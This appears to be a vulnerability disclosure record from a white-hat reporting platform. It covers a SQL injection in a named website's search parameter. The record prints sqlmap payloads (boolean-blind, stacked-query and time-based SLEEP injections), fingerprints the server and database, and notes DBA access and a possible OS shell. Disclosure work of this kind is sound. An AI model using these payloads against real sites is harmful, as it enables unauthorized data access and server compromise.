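2015-06-01: Details reported to the vendor; awaiting vendor handling
2015-06-01: Vendor confirmed; details disclosed to the vendor only
2015-06-11: Details disclosed to core white hats and experts in related fields
2015-06-21: Details disclosed to regular white hats
2015-07-01: Details disclosed to intern white hats
2015-07-16: Details disclosed to the public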
233
http://www.ln86e.com/Shequ/Search.aspx?page=1&SearchTxt=1&tag=1 (search keyword)
---
Parameter: SearchTxt (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: page=1&SearchTxt=-2599' OR 9566=9566 AND 'Sdri' LIKE 'Sdri&tag=1

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: page=1&SearchTxt=1';(SELECT * FROM (SELECT(SLEEP(5)))ZcZJ)#&tag=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=1&SearchTxt=1' AND (SELECT * FROM (SELECT(SLEEP(5)))bKfN) AND 'ihhG' LIKE 'ihhG&tag=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.11
current user is DBA: True
Database: ln_zsxx
[126 tables]

os-shell is possible
~
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-06-01 20:07
Thanks to 路人甲 for reporting the vulnerability; a fix is being arranged
None yet